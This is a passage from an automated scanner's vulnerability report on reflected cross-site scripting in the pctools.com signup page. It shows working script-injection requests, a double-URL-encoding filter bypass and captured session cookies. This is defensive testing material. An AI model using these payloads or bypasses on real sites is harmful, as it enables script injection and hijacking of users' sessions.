Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:11 GMT
Connection: keep-alive
Content-Length: 22345

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<9cec9><script>alert(1)</script>5f5a377f571/script>
...[SNIP]...

1.7. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f29fc%253balert%25281%2529%252f%252f335124be5bd3efa8e was submitted in the REST URL parameter 5. This input was echoed as f29fc;alert(1)//335124be5bd3efa8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3Cf29fc%253balert%25281%2529%252f%252f335124be5bd3efa8e/script%3E?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:17:56 GMT
Connection: keep-alive
Content-Length: 22335

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<f29fc;alert(1)//335124be5bd3efa8e/script>
...[SNIP]...

1.8. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2d023%253balert%25281%2529%252f%252fb27bac03db5 was submitted in the REST URL parameter 5. This input was echoed as 2d023;alert(1)//b27bac03db5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C2d023%253balert%25281%2529%252f%252fb27bac03db5/script%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:19 GMT
Connection: keep-alive
Content-Length: 22263

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
<2d023;alert(1)//b27bac03db5/script>
...[SNIP]...

1.9. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag. The payload 7afc0><script>alert(1)</script>b4cd72b9ca4f1a154 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/7afc0><script>alert(1)</script>b4cd72b9ca4f1a154/script%3E?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:17:49 GMT
Connection: keep-alive
Content-Length: 22045

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
</7afc0><script>alert(1)</script>b4cd72b9ca4f1a154/script>
...[SNIP]...

1.10. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag. The payload 9f713><script>alert(1)</script>767c0ee65c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/9f713><script>alert(1)</script>767c0ee65c9/script%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www2.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:14 GMT
Connection: keep-alive
Content-Length: 21973

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
</9f713><script>alert(1)</script>767c0ee65c9/script>
...[SNIP]...

1.11. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7cbde%253balert%25281%2529%252f%252f7a84aff00d8 was submitted in the REST URL parameter 6. This input was echoed as 7cbde;alert(1)//7a84aff00d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/7cbde%253balert%25281%2529%252f%252f7a84aff00d8 HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:23 GMT
Connection: keep-alive
Content-Length: 22179

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
</7cbde;alert(1)//7a84aff00d8/">
...[SNIP]...

1.12. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fff0d<script>alert(1)</script>30170422295c650dd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3Efff0d<script>alert(1)</script>30170422295c650dd?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671988|PC#1300668855394-755649.17#1301879728|check#true#1300670188; IS3_GSV=DPL-2_TES-1300668856_PCT-1300670164_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:18:07 GMT
Connection: keep-alive
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
</script>fff0d<script>alert(1)</script>30170422295c650dd">
...[SNIP]...

1.13. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21fdc<script>alert(1)</script>caacfd05dec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E21fdc<script>alert(1)</script>caacfd05dec HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; __qca=P0-78397944-1300668861448; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www1.pctools.com:8080
Date: Mon, 21 Mar 2011 01:16:26 GMT
Connection: keep-alive
Content-Length: 22212

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools - My Account Signup
</title>
   <meta http-equiv="content-type
...[SNIP]...
</script>21fdc<script>alert(1)</script>caacfd05dec">
...[SNIP]...

1.14. https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8e134%253balert%25281%2529%252f%252f0c318281ed77126a3 was submitted in the REST URL parameter 6. This input was echoed as 8e134;alert(1)//0c318281ed77126a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/8e134%253balert%25281%2529%252f%252f0c318281ed77126a3?step=2e957eb8c030fc2d10de5607715f4c55&email=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000745%29%3C%2Fscript%3E HTTP/1.1
Host: secure.pctools.com
Connection: keep-alive
Referer: https://secure.pctools.com/myaccount/signup/%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E
Cache-Control: max-age=0
Origin: https://secure.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
